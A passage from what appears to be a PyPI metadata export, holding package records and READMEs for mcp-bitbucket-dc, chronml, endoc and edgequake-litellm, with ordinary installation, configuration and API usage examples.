"Changelog, https://github.com/tokitahmidtoufa/cntimer/releases"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:09:40.757665 | cntimer-0.1.11.tar.gz | 7,017 | ef/36/cb9f7728b81dc5467a09b2d6484371548568923656a3614759fa15a43769/cntimer-0.1.11.tar.gz | source | sdist | null | false | 813b4d620ae26ab953f2f9d3312fcba3 | 27acc4042825549818958df4ba98a23a0d9299831a77052b67d77b5e987730a5 | ef36cb9f7728b81dc5467a09b2d6484371548568923656a3614759fa15a43769 | MIT | [
"LICENSE"
] | 220 |
2.4 | mcp-bitbucket-dc | 0.2.0 | MCP server for Bitbucket Data Center — code search, file browsing, PRs, commits, and more. | # mcp-bitbucket-dc
[](https://pypi.org/project/mcp-bitbucket-dc/)
[](LICENSE)
MCP (Model Context Protocol) server for **Bitbucket Data Center**. Enables AI assistants to search code, browse files, manage pull requests, and explore repositories through a standardized interface.
Built with [FastMCP](https://github.com/jlowin/fastmcp) in Python. Installs via `uvx` — no Node.js required.
## Quick Start
### 1. Generate a Personal Access Token
1. Log in to your Bitbucket Data Center instance
2. Go to **Manage Account → HTTP access tokens**
3. Click **Create token**
4. Set permissions: **Repository Read** (and **Write** if you need PR creation/commenting)
5. Copy the token
### 2. Configure Your IDE
Add to your MCP configuration (`mcp.json` in VS Code, `claude_desktop_config.json` for Claude Desktop):
```json
{
"mcpServers": {
"bitbucket-dc": {
"command": "uvx",
"args": ["mcp-bitbucket-dc"],
"env": {
"BITBUCKET_HOST": "git.yourcompany.com",
"BITBUCKET_API_TOKEN": "your-personal-access-token"
}
}
}
}
```
That's it. The server starts automatically when your IDE connects.
### 3. Start Using
Ask your AI assistant:
- *"Search for CompanyInfoUpdater in the codebase"*
- *"Show me the file structure of the api-service repo in PROJECT"*
- *"Get the content of src/main/Application.java from repo backend"*
- *"List open pull requests in PROJECT/my-repo"*
- *"What branches exist in PROJECT/my-repo?"*
## Tools Reference
### Code Search (NEW)
| Tool | Description |
|---|---|
| `bitbucket_code_search` | Search code across all repos with Lucene syntax (`ext:java`, `lang:python`, `repo:name`, `project:KEY`, `AND`/`OR`/`NOT`) |
### File Browsing (NEW)
| Tool | Description |
|---|---|
| `bitbucket_browse` | Browse directory tree (files & folders at a path) |
| `bitbucket_get_file_content` | Get raw file content with syntax highlighting |
| `bitbucket_list_files` | Recursively list all file paths in a repo |
| `bitbucket_get_branches` | List branches (filterable) |
| `bitbucket_get_tags` | List tags (filterable) |
### Projects & Repositories
| Tool | Description |
|---|---|
| `bitbucket_get_projects` | List projects (filterable by name/permission) |
| `bitbucket_get_project` | Get project details |
| `bitbucket_get_repositories` | List repos in a project |
| `bitbucket_get_repository` | Get repo details with clone URLs |
### Pull Requests
| Tool | Description |
|---|---|
| `bitbucket_get_pull_requests` | List PRs (filter by state, direction, text) |
| `bitbucket_get_pull_request` | Get PR details with reviewers |
| `bitbucket_get_pull_request_comments` | Get PR comments and activity |
| `bitbucket_get_pull_request_changes` | Get files changed in a PR |
| `bitbucket_get_pull_request_diff` | Get diff for a file in a PR |
| `bitbucket_post_pull_request_comment` | Post a comment (general or inline) |
| `bitbucket_create_pull_request` | Create a new PR |
| `bitbucket_update_pull_request` | Update PR title/description/reviewers |
| `bitbucket_get_required_reviewers` | Get required reviewers for a branch pair |
### Commits
| Tool | Description |
|---|---|
| `bitbucket_get_commits` | List commits (filter by path, ref range) |
## Search Query Syntax
The `bitbucket_code_search` tool uses Lucene-style queries:
```
# Simple text search
CompanyInfoUpdater
# Filter by file extension
function ext:java
# Filter by language
config lang:python
# Filter by repository or project
DatabaseHelper repo:backend-api
service project:PLATFORM
# Filter by path
controller path:src/main
# Boolean operators (must be UPPERCASE)
config AND (yaml OR yml)
test NOT unit
UserService AND ext:java AND project:CORE
```
## Configuration
| Environment Variable | Required | Description |
|---|---|---|
| `BITBUCKET_HOST` | Yes* | Bitbucket DC hostname (e.g. `git.company.com`) |
| `BITBUCKET_URL` | Yes* | Full base URL alternative (e.g. `https://git.company.com`) |
| `BITBUCKET_API_TOKEN` | Yes | Personal Access Token |
\* Provide either `BITBUCKET_HOST` or `BITBUCKET_URL`, not both.
## Alternative Transports
```bash
# SSE transport (for remote/multi-user setups)
uvx mcp-bitbucket-dc --transport sse --port 8000
# Streamable HTTP
uvx mcp-bitbucket-dc --transport streamable-http --port 8000
```
## Development
```bash
# Clone and install
git clone https://github.com/christopherekfeldt/mcp-bitbucket-dc.git
cd mcp-bitbucket-dc
uv sync
# Run locally
export BITBUCKET_HOST=git.yourcompany.com
export BITBUCKET_API_TOKEN=your-token
uv run mcp-bitbucket-dc
# Run tests
uv run pytest
```
## License
MIT — see [LICENSE](LICENSE).
| text/markdown | Christopher Ekfeldt | null | null | null | MIT | atlassian, bitbucket, code-search, data-center, mcp | [
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Version Control :: Git"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"click>=8.1.0",
"fastmcp>=2.0.0",
"httpx>=0.27.0",
"pydantic>=2.0"
] | [] | [] | [] | [
"Homepage, https://github.com/christopherekfeldt/mcp-bitbucket-dc",
"Repository, https://github.com/christopherekfeldt/mcp-bitbucket-dc",
"Issues, https://github.com/christopherekfeldt/mcp-bitbucket-dc/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:09:29.285784 | mcp_bitbucket_dc-0.2.0.tar.gz | 107,420 | f1/82/58b0fa5cf7b6c90f1294a76b4929f4c2115a3e8ffc3234746afd21b127b6/mcp_bitbucket_dc-0.2.0.tar.gz | source | sdist | null | false | ba9e8430c547c18ac2fc6f15e852bc1c | da568ce16d883be7b06da7694fbdc3d857d554ed0c1cd5daacf058e260d7e9dc | f18258b0fa5cf7b6c90f1294a76b4929f4c2115a3e8ffc3234746afd21b127b6 | null | [
"LICENSE"
] | 211 |
2.4 | chronml | 0.1.0 | CHRON: Configurable Human-Readable Object Notation | # CHRON
CHRON stands for **Configurable Human-Readable Object Notation**.
CHRON is a Python library for round-tripping structured objects through
review-friendly Markdown text with explicit marker metadata.
## Why CHRON
- Human-readable output for review and diff.
- Machine-loadable with deterministic reconstruction.
- Typed records supported through `pydantic` model metadata.
- Configurable marker namespace prefix.
- No regex parsing in core codec paths.
- Marker-level grammar parsed via `lark`.
- JSON path resolution and matching via `jsonpath_ng`.
## Install
```bash
pip install chronml
```
## Quick Start
```python
from chronml import Chron
chronml = Chron()
records = [
{"title": "hello", "body": "line1\nline2"}
]
md = chronml.dumps(records, template="# {$.title}\n\n{$.body:block}")
print(md)
loaded = chronml.loads(md)
assert loaded[0]["title"] == "hello"
assert loaded[0]["body"] == "line1\nline2"
```
## Markdown Output Examples
### 1) Inline + Block
Python:
```python
from chronml import Chron
chronml = Chron()
md = chronml.dumps(
[{"title": "hello", "body": "line1\nline2"}],
template="# {$.title}\n\n{$.body:block}",
)
print(md)
```
Output:
```markdown
<!-- chronml:begin type=json skeleton={} -->
# <!-- chronml:value-begin json-path=$.title --> hello <!-- chronml:value-end -->
<!-- chronml:multi-line-value-begin json-path=$.body -->
line1
line2
<!-- chronml:multi-line-value-end -->
<!-- chronml:end -->
```
### 2) Code Block
Python:
```python
from chronml import Chron
chronml = Chron()
md = chronml.dumps(
[{"code": "print(1)\nprint(2)"}],
template="{$.code:code-block-python}",
)
print(md)
```
Output:
````markdown
<!-- chronml:begin type=json skeleton={} -->
<!-- chronml:code-block-begin lang=python json-path=$.code -->
```python
print(1)
print(2)
```
<!-- chronml:code-block-end -->
<!-- chronml:end -->
````
### 3) Wildcard Multi-Match (`[*]`)
Python:
```python
from chronml import Chron
chronml = Chron()
md = chronml.dumps(
[{"items": [{"name": "A"}, {"name": "B"}]}],
template="items: {$.items[*].name}",
)
print(md)
```
Output (flattened with concrete paths):
```markdown
<!-- chronml:begin type=json skeleton={"items": [{}, {}]} -->
items: <!-- chronml:value-begin json-path=$.items[0].name --> A <!-- chronml:value-end --> <!-- chronml:value-begin json-path=$.items[1].name --> B <!-- chronml:value-end -->
<!-- chronml:end -->
```
### 4) Nested Model Template Expansion
Python:
```python
from pydantic import BaseModel
from chronml import Chron
class Child(BaseModel):
x: int
y: str
__chronml_template__ = "X={$.x}\nY={$.y}"
class Parent(BaseModel):
name: str
child: Child
__chronml_template__ = "N={$.name}\n{$.child}"
chronml = Chron()
md = chronml.dumps([Parent(name="p", child=Child(x=5, y="yy"))], template="")
print(md)
```
Output (nested paths rewritten to global paths):
```markdown
<!-- chronml:begin type=pydantic:__main__.Parent skeleton={"child": {}} -->
N=<!-- chronml:value-begin json-path=$.name --> p <!-- chronml:value-end -->
X=<!-- chronml:value-begin type=int json-path=$.child.x --> 5 <!-- chronml:value-end -->
Y=<!-- chronml:value-begin json-path=$.child.y --> yy <!-- chronml:value-end -->
<!-- chronml:end -->
```
## Core API
- `Chron.loads(text) -> list[record]`
- `Chron.load(path) -> list[record]`
- `Chron.dumps(records, template=..., template_func=...) -> str`
- `Chron.dump(records, path, template=..., template_func=...) -> None`
Module-level helpers with the same names are also exported:
`loads`, `load`, `dumps`, `dump`.
## Template Syntax
Placeholder forms:
- `{$.path}` inline value
- `{$.path:inline}` inline value
- `{$.path:block}` multi-line value block
- `{$.path:code-block}` fenced code block
- `{$.path:code-block-python}` fenced code block with language
- `{$.items[*].name}` multi-match flattening
For wildcard and other multi-match expressions, CHRON expands all matches in
result order. Emitted marker paths are concrete (`$.items[0].name`, ...).
## Marker Prefix
Default prefix is `chronml:`.
```python
chronml = Chron(marker_prefix="custom:")
```
Then markers are emitted as:
- `<!-- custom:begin ... -->`
- `<!-- custom:value-begin ... -->`
- `<!-- custom:end -->`
## Pydantic Support
If a record is a `pydantic.BaseModel`, CHRON stores record type metadata as
`type=pydantic:<module>.<ClassName>` and reconstructs model instances on load.
Template resolution order per record:
1. `obj.__chronml_template__` (string only)
2. `template_func(obj)`
3. `template` argument
Nested model templates are expanded in place for inline/default placeholders,
and nested paths are rewritten to global paths.
## Escaping and Round-Trip Guarantees
CHRON escapes marker-like payload text, including existing escaped marker
literals, with reversible encoding. This preserves:
- leading/trailing spaces in inline text
- multi-line content and trailing spaces in block mode
- marker-like text inside payload content
## Protocol and AST
- Marker AST spec: `docs/ast-spec.md`
- Release checklist: `docs/release.md`
## Development
Run tests:
```bash
uv run --with pytest pytest tests -q
```
Build artifacts:
```bash
uv run --with build python -m build
```
| text/markdown | CHRON contributors | null | null | null | MIT | chronml, markdown, object-notation, serialization, template | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Software Development :: Libraries"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"jsonpath-ng>=1.6.1",
"lark>=1.2.0",
"pydantic>=2.0.0",
"build>=1.2.0; extra == \"dev\"",
"pytest>=8.0; extra == \"dev\"",
"twine>=5.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/your-org/chronml",
"Repository, https://github.com/your-org/chronml",
"Issues, https://github.com/your-org/chronml/issues"
] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T09:09:28.629150 | chronml-0.1.0.tar.gz | 61,861 | c4/f9/88eee7ebad8c352e4896ef9fe1acdcf752630c82f1fd8a09bfaae1a96318/chronml-0.1.0.tar.gz | source | sdist | null | false | 522f14c4799cd6575fe32d476acda4ca | 6c64529bea1054c36a506a0eaaac22a35ecbab71eebb76ab5604d70bd4d08a35 | c4f988eee7ebad8c352e4896ef9fe1acdcf752630c82f1fd8a09bfaae1a96318 | null | [] | 253 |
2.4 | endoc | 1.7.1 | Endoc SDK: A note-taking app SDK powered by LLMs | <div style="text-align: center;">
<img src="https://drive.google.com/uc?export=view&id=18VZK4uejxuPABSQOAiXK2l2EziYwDvdb" alt="Endoc SDK Logo" style="width:50%;">
</div>
<p align="center">
<img src="https://img.shields.io/pypi/pyversions/endoc?logo=python&logoColor=%23ffd343&color=%23ffd343" />
<img src="https://img.shields.io/pypi/l/endoc" />
<img src="https://img.shields.io/pypi/v/endoc?logo=pypi&logoColor=%23ffd343&color=%23ffd343" />
<img src="https://img.shields.io/pypi/dm/endoc?style=flat&color=red" />
<img src="https://img.shields.io/pypi/dd/endoc" />
<a href="https://endoc.ethz.ch">
<img src="https://img.shields.io/badge/powered_by-Endoc-blue" alt="Powered by Endoc">
</a>
</p>
# Endoc SDK
Endoc SDK is a Python library that provides powerful tools for advanced paper search, summarization, and note management using a GraphQL API. It leverages [Pydantic](https://pydantic-docs.helpmanual.io/) for robust data validation and modeling, so that all responses are returned as easy‐to‐use Python objects. In addition, Endoc SDK offers an extensibility mechanism to allow you to create custom composite services without modifying the core code.
## Features
- **Document Search:** Search and filter papers using ranking variables and keywords.
- **Summarize Paper:** Generate summaries for individual papers.
- **Paginated Search:** Retrieve paginated search results.
- **Single Paper Search:** Get detailed information about a single paper.
- **Note Library:** Retrieve papers associated with a note.
- **Title Search:** Resolve papers from title lists.
- **PDF Import (API key flow):** Upload local PDFs for indexing/import.
- **Custom Services:** Easily extend the client with your own functions.
## Installation
Install Endoc SDK via pip:
```bash
pip install endoc
```
## Setup
1. **Obtain Your API Key:**
- Visit [https://endoc.ethz.ch](https://endoc.ethz.ch) and sign up using your Switch Edu-ID credentials.
- After logging in, click on the **Account** option in the side panel.
- Under the **Developer API** section, click **Generate** to create a new API key.
- Copy the generated API key for later use.
2. **Create a `.env` File (optional):**
- In your project's root directory, create a file named `.env`.
- Add your API key to the file using one of these supported keys:
```
ENDOC_API_KEY=your_api_key_here
# or
API_KEY=your_api_key_here
```
3. **Load Environment Variables (if using `.env`):**
- Install [python-dotenv](https://pypi.org/project/python-dotenv/) if you haven't already:
```bash
pip install python-dotenv
```
- In your Python script:
```python
from dotenv import load_dotenv
load_dotenv()
```
4. **Instantiate the Endoc client**
- In your Python script, instantiate `EndocClient`:
```python
client = EndocClient(api_key=None) # reads ENDOC_API_KEY/API_KEY from env
# or
client = EndocClient(api_key="your_api_key_here")
```
5. **(Optional) Override GraphQL endpoint**
- By default the SDK uses:
`https://endoc.ethz.ch/graphql`
- To target another deployment (e.g. local gateway), set:
```
ENDOC_GRAPHQL_URL=http://localhost:9000/graphql
```
## Basic Usage
### 1) Document Search
To search for papers, call the `document_search` method. This returns a `DocumentSearchData` object.
```python
doc_search_result = client.document_search(
ranking_variable="BERT",
keywords=["AvailableField:Content.Fullbody_Parsed"]
)
# Accessing properties:
print(doc_search_result.status)
print(doc_search_result.response.search_stats.nMatchingDocuments)
print(doc_search_result.response.paper_list[0].id_value)
```
### 2) Summarize Paper
Call the summarize method with a paper ID to get a summary. The result is a `SummarizationResponseData` object.
```python
summarize_result = client.summarize("221802394")
# Example usage:
print(summarize_result.status)
# You can further inspect summarize_result.response for detailed summary items.
```
### 3) Paginated Search
Use the `paginated_search` method to retrieve paginated results. Prepare a list of paper metadata as input.
```python
example_paper = {
"collection": "S2AG",
"id_field": "id_int",
"id_type": "int",
"id_value": "221802394"
}
paper_list = [example_paper]
paginated_result = client.paginated_search(paper_list=paper_list)
# Example usage:
print(paginated_result.status)
```
### 4) Single Paper Search
To fetch detailed information for a single paper, use the `single_paper` method. This returns a `SinglePaperData` object.
```python
single_paper_result = client.single_paper("221802394")
# Example usage:
print(single_paper_result.response.Title)
```
### 5) Get Note Library
Retrieve papers related to a note by calling the `get_note_library` method. This returns a `GetNoteLibraryResponse` object. To find your note ID, navigate to a note on Endoc and copy the last part of the url, e.g. for `https://endoc.ethz.ch/note/679a1e2e5b25cf001a7c7157`, the note's ID is `679a1e2e5b25cf001a7c7157`.
```python
note_library_result = client.get_note_library("679a1e2e5b25cf001a7c7157")
if note_library_result.response:
print(note_library_result.response[0].id_value)
```
### 6) Import PDFs from local folder
```python
result_batches = client.import_pdfs_from_folder(
folder_path="/absolute/path/to/pdfs",
recursive=False,
max_file_mb=50,
batch_size=5,
)
for batch in result_batches:
print(batch.status, batch.message, len(batch.response or []))
```
Or use the example script:
```bash
python examples/upload_pdf.py --folder "/absolute/path/to/pdfs"
```
## Extending the Client with Custom Services
Endoc SDK allows you to add your own composite services without modifying the core code. You have two options:
### Option 1: Using the `register_service` Decorator
Endoc SDK re-exports the register_service decorator, so you can define custom methods that become part of the client interface. For example:
```python
from endoc import register_service
@register_service("combined_search")
def combined_search(self, paper_list, id_value):
paginated = self.paginated_search(paper_list, keywords=["example"])
single = self.single_paper(id_value)
return {"paginated": paginated, "single": single}
result = client.combined_search(paper_list, "221802394")
print("Combined Search Result:", result)
```
### Option 2: Using the `register_service` Method
Alternatively, you can register a custom service function directly on the client instance:
```python
def my_custom_service(paper_list, id_value):
paginated = client.paginated_search(paper_list, keywords=["custom"])
single = client.single_paper(id_value)
return {"paginated": paginated, "single": single}
client.register_service("my_custom_service", my_custom_service)
result = client.my_custom_service(paper_list, "221802394")
print("My Custom Service Result:", result)
```
## Package Structure
The package is organized as follows:
```plaintext
endoc/
├── __init__.py
├── client.py
├── decorators.py
├── endoc_client.py
├── exceptions.py
├── queries.py
├── models/
│ ├── document_search.py
│ ├── note_library.py
│ ├── paginated_search.py
│ ├── pdf_import.py
│ ├── single_paper.py
│ ├── summarization.py
│ └── title_search.py
└── services/
├── document_search.py
├── get_note_library.py
├── paginated_search.py
├── pdf_import.py
├── single_paper_search.py
├── summarization.py
└── title_search.py
examples/
├── test_document_search.py
└── upload_pdf.py
tests/
├── conftest.py
├── fixtures/
└── unit/
├── test_auth.py
├── test_custom_services.py
├── test_document_search.py
├── test_paginated_search.py
├── test_pdf_import.py
├── test_single_paper.py
└── test_summarization.py
```
## Environment Variables
Supported variables:
- `ENDOC_API_KEY` or `API_KEY`: API key used by the SDK.
- `ENDOC_GRAPHQL_URL` (optional): override default endpoint (`https://endoc.ethz.ch/graphql`).
Use a `.env` file and `python-dotenv` to load variables:
```python
from dotenv import load_dotenv
load_dotenv()
```
## Testing
Endoc SDK includes a test suite to ensure quality and maintain high coverage. The tests are organized by functionality, making it easy to add new tests or modify existing ones.
- Make sure you have installed `pytest` and any other test dependencies:
```bash
pip install pytest
```
### Running the Tests
In the SDK root (`endoc-sdk/`), run:
```bash
python -m pytest
```
### Test Organization
#### Fixtures
The `tests/fixtures` folder holds reusable components like mock responses and dummy clients (e.g., `dummy_api.py`).
A document_search_fixtures.py file might contain fixtures that set up data or patch classes for document search tests.
#### Unit Tests
Located in `tests/unit`, these tests focus on individual modules or classes, mocking external calls.
For example, `test_document_search.py` might ensure the `DocumentSearchService` parses JSON correctly.
#### Integration Tests
Placed in `tests/integration`, these tests cover how multiple parts of the SDK interact. They may call real endpoints in a staging environment or use more extensive mocks that simulate multi-step workflows.
#### `conftest.py`
Pytest automatically discovers and uses any fixtures defined in `conftest.py`.
You can place shared fixtures here (like a global mock of your API client or environment setup).
## Contributing
Contributions are welcome! Please open issues or submit pull requests on the GitHub repository. Ensure that any contributions adhere to the existing code style and include tests where applicable.
## License
This project is licensed under the MIT license.
| text/markdown | null | Grigor Dochev <gdochev@ethz.ch>, Andreas Giannoutsos <agiannoutsos@ethz.ch> | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.7 | [] | [] | [] | [
"gql[requests]>=3.5.0",
"pydantic>=1.10"
] | [] | [] | [] | [
"Homepage, https://github.com/science-editor/endoc-sdk"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:08:45.605367 | endoc-1.7.1.tar.gz | 16,529 | 0c/18/c3c68a0ed9b737c2ce6347c437e92b5e877dcd2903a23369923b695162d4/endoc-1.7.1.tar.gz | source | sdist | null | false | 656c2ff8362ebe1b8f33a01f1f6def5a | 7bc4a4e80cb93ac3be3e70a8ef4e83bab64eee49fa6e33e8f2936a8d983147cd | 0c18c3c68a0ed9b737c2ce6347c437e92b5e877dcd2903a23369923b695162d4 | null | [
"LICENSE"
] | 226 |
2.4 | edgequake-litellm | 0.1.1 | Drop-in LiteLLM replacement backed by Rust — same API, 10× lower latency | # edgequake-litellm
**Drop-in LiteLLM replacement backed by Rust — same API, lower overhead.**
[](https://pypi.org/project/edgequake-litellm/)
[](https://pypi.org/project/edgequake-litellm/)
[](https://github.com/raphaelmansuy/edgequake-llm/actions/workflows/python-ci.yml)
[](../LICENSE-APACHE)
`edgequake-litellm` wraps the [`edgequake-llm`](https://crates.io/crates/edgequake-llm) Rust core via [PyO3](https://pyo3.rs/), providing a high-performance drop-in for [LiteLLM](https://github.com/BerriAI/litellm). Swap the import — the rest of your code stays unchanged.
```python
# Before
import litellm
# After — same API, Rust-backed
import edgequake_litellm as litellm
```
## Features
- **LiteLLM-compatible API** — `completion()`, `acompletion()`, `stream()`, `embedding()`, same call signatures, same response shape (`resp.choices[0].message.content`).
- **Multi-provider routing** — OpenAI, Anthropic, Gemini, Mistral, OpenRouter, xAI, Ollama, LM Studio, HuggingFace, and more, via `provider/model` strings.
- **Async-native** — built on Tokio; sync and async Python both supported.
- **Single wheel per platform** — uses PyO3's `abi3-py39` stable ABI, one `.whl` covers Python 3.9–3.13+.
- **Zero Python runtime dependencies** — the Rust extension is self-contained.
- **Full type annotations** — ships with `py.typed` and `.pyi` stubs.
- **`max_completion_tokens` support** — works for all OpenAI model families including `o1`, `o3-mini`, `o4-mini`, `gpt-4.1`, `gpt-4.1-nano` that require this field.
- **Cache hit tokens** — `resp.cache_hit_tokens` exposes OpenAI prompt cache hits and Anthropic cache reads.
- **Reasoning tokens** — `resp.thinking_tokens` surfaces o-series reasoning and Claude extended thinking token counts.
## What's New in 0.1.1
- **`max_completion_tokens` fixed** for OpenAI o-series and gpt-4.1 model families (previously returned 400 Bad Request).
- **`resp.cache_hit_tokens`** — new property returning tokens served from provider cache (`None` if not applicable).
- **`resp.thinking_tokens`** — new property returning reasoning/thinking token count for o-series and Claude models.
- Both new properties are included in `resp.to_dict()`.
See [CHANGELOG.md](CHANGELOG.md) for the full history.
## Installation
```bash
pip install edgequake-litellm
```
## Quick Start
```python
import edgequake_litellm as litellm # drop-in import alias
# ── Synchronous chat ────────────────────────────────────────────────────────
resp = litellm.completion(
"openai/gpt-4o-mini",
[{"role": "user", "content": "Hello, world!"}],
)
# litellm-compatible access
print(resp.choices[0].message.content)
# convenience shortcut
print(resp.content)
# ── Asynchronous chat ───────────────────────────────────────────────────────
import asyncio
async def main():
resp = await litellm.acompletion(
"anthropic/claude-3-5-haiku-20241022",
[{"role": "user", "content": "Tell me a joke."}],
max_tokens=128,
temperature=0.8,
)
print(resp.choices[0].message.content)
asyncio.run(main())
# ── Streaming (async generator) ─────────────────────────────────────────────
async def stream_example():
messages = [{"role": "user", "content": "Count to five."}]
async for chunk in litellm.acompletion("openai/gpt-4o", messages, stream=True):
print(chunk.choices[0].delta.content or "", end="", flush=True)
# ── Embeddings ──────────────────────────────────────────────────────────────
result = litellm.embedding(
"openai/text-embedding-3-small",
["Hello world", "Rust is fast"],
)
# litellm-compatible access
print(result.data[0].embedding[:3])
# legacy list access still works
print(len(result), len(result[0])) # 2 1536
```
## Provider Routing
Pass `provider/model` as the first argument — the prefix selects the provider:
| Provider | Example model string |
|--------------|-----------------------------------------------------|
| OpenAI | `openai/gpt-4o` |
| Anthropic | `anthropic/claude-3-5-sonnet-20241022` |
| Google Gemini| `gemini/gemini-2.0-flash` |
| Mistral | `mistral/mistral-large-latest` |
| OpenRouter | `openrouter/meta-llama/llama-3.1-70b-instruct` |
| xAI | `xai/grok-3-beta` |
| Ollama | `ollama/llama3.2` |
| LM Studio | `lmstudio/local-model` |
| HuggingFace | `huggingface/mistralai/Mixtral-8x7B-Instruct-v0.1` |
| Mock (tests) | `mock/any-name` |
## API Reference
### `completion(model, messages, **kwargs) → ModelResponseCompat`
Synchronous chat completion. Blocks but releases the GIL during Rust I/O so other Python threads keep running.
```python
resp = litellm.completion(
"openai/gpt-4o",
messages,
max_tokens=256,
temperature=0.7,
system="You are a helpful assistant.",
max_completion_tokens=256, # alias for max_tokens; required for o1/o3/gpt-4.1 models
seed=42,
response_format={"type": "json_object"}, # or "text" / "json_object"
)
# All of these access the same content:
resp.choices[0].message.content # litellm path
resp.content # shortcut
resp["choices"][0]["message"]["content"] # dict-style
resp.usage.total_tokens
resp.model
resp.response_ms # latency in milliseconds
resp.to_dict() # plain dict
# New in 0.1.1 — cache and reasoning token metadata
resp.cache_hit_tokens # int | None — tokens served from provider cache
resp.thinking_tokens # int | None — reasoning tokens (o-series, Claude)
resp.thinking_content # str | None — visible thinking text (Claude)
# The same data via usage object:
resp.usage.cache_read_input_tokens # same as resp.cache_hit_tokens
resp.usage.reasoning_tokens # same as resp.thinking_tokens
```
### `acompletion(model, messages, stream=False, **kwargs)`
Async chat completion. Returns `ModelResponseCompat` or (if `stream=True`) `AsyncGenerator[StreamChunkCompat, None]`.
```python
# Non-streaming
resp = await litellm.acompletion("openai/gpt-4o", messages)
# Streaming
async for chunk in await litellm.acompletion("openai/gpt-4o", messages, stream=True):
print(chunk.choices[0].delta.content or "", end="")
```
### `stream(model, messages, **kwargs) → AsyncGenerator[StreamChunk, None]`
Low-level streaming. Raw `StreamChunk` objects:
```python
async for chunk in litellm.stream("openai/gpt-4o", messages):
if chunk.content:
print(chunk.content, end="")
elif chunk.is_finished:
print(f"\n[stop: {chunk.finish_reason}]")
```
### `embedding(model, input, **kwargs) → EmbeddingResponseCompat`
Synchronous embeddings. Returns an `EmbeddingResponseCompat` that supports both litellm-style and legacy list-style access:
```python
result = litellm.embedding("openai/text-embedding-3-small", ["foo", "bar"])
# litellm path
result.data[0].embedding
# backwards-compatible list access
for vec in result: # iterates List[float]
print(len(vec))
result[0] # List[float]
len(result) # number of vectors
```
### `aembedding(model, input, **kwargs) → EmbeddingResponseCompat`
Async embeddings — same return type as `embedding()`.
### `stream_chunk_builder(chunks, messages=None) → ModelResponseCompat`
Reconstruct a full `ModelResponseCompat` from a collected list of streaming chunks:
```python
from edgequake_litellm import stream_chunk_builder
chunks = []
async for chunk in litellm.stream("openai/gpt-4o", messages):
chunks.append(chunk)
full = stream_chunk_builder(chunks, messages=messages)
print(full.content)
```
## Configuration
Module-level globals mirror `litellm`:
```python
import edgequake_litellm as litellm
litellm.set_verbose = True # enable debug logging
litellm.drop_params = True # drop unknown params (always True)
# Set default provider / model
litellm.set_default_provider("anthropic")
litellm.set_default_model("claude-3-5-haiku-20241022")
# Now the provider prefix can be omitted:
resp = litellm.completion("claude-3-5-haiku-20241022", messages)
```
## Exception Hierarchy
Exceptions mirror LiteLLM for painless migration:
```python
import edgequake_litellm as litellm
try:
resp = litellm.completion("openai/gpt-4o", messages)
except litellm.AuthenticationError as e:
print(f"Check your API key: {e}")
except litellm.RateLimitError:
time.sleep(5)
except litellm.ContextWindowExceededError:
# trim messages and retry
pass
except litellm.NotFoundError: # alias for ModelNotFoundError
pass
except litellm.APIConnectionError:
pass
```
All exceptions (`AuthenticationError`, `RateLimitError`, `ContextWindowExceededError`, `ModelNotFoundError`, `Timeout`, `APIConnectionError`, `APIError`) are also available from `edgequake_litellm.exceptions`.
## Environment Variables
Provider credentials follow the standard naming convention:
| Provider | Environment variable |
|--------------|-----------------------------------------------------------|
| OpenAI | `OPENAI_API_KEY` |
| Anthropic | `ANTHROPIC_API_KEY` |
| Gemini | `GEMINI_API_KEY` |
| Mistral | `MISTRAL_API_KEY` |
| OpenRouter | `OPENROUTER_API_KEY` |
| xAI | `XAI_API_KEY` |
| HuggingFace | `HF_TOKEN` |
| Ollama | `OLLAMA_HOST` (default: `http://localhost:11434`) |
| LM Studio | `LMSTUDIO_HOST` (default: `http://localhost:1234`) |
Defaults can also be set via `LITELLM_EDGE_PROVIDER` / `LITELLM_EDGE_MODEL`.
## Development
### Prerequisites
- Rust ≥ 1.83 (`rustup toolchain install stable`)
- Python ≥ 3.9
- `pip install maturin`
### Build from source
```bash
git clone https://github.com/raphaelmansuy/edgequake-llm.git
cd edgequake-llm/edgequake-litellm
# Create a virtual environment
python -m venv .venv
source .venv/bin/activate # Windows: .venv\Scripts\activate
pip install maturin pytest pytest-asyncio ruff mypy
# Build & install in dev mode (incremental Rust + Python)
maturin develop --release
# Run unit tests (mock provider — no API keys needed)
pytest tests/ -k "not e2e" -v
```
### Running E2E tests
```bash
export OPENAI_API_KEY=sk-...
pytest tests/test_e2e_openai.py -v
```
### Publishing
```bash
# Bump version in pyproject.toml AND Cargo.toml (must match), then:
git tag py-v0.2.0
git push --tags
# GitHub Actions builds and publishes to PyPI automatically.
```
## License
Apache-2.0 — see [LICENSE-APACHE](../LICENSE-APACHE).
| text/markdown; charset=UTF-8; variant=GFM | EdgeQuake Contributors | null | EdgeQuake Contributors | null | Apache-2.0 | llm, litellm, openai, anthropic, gemini, mistral, ai, rust | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Rust",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Typing :: Typed"
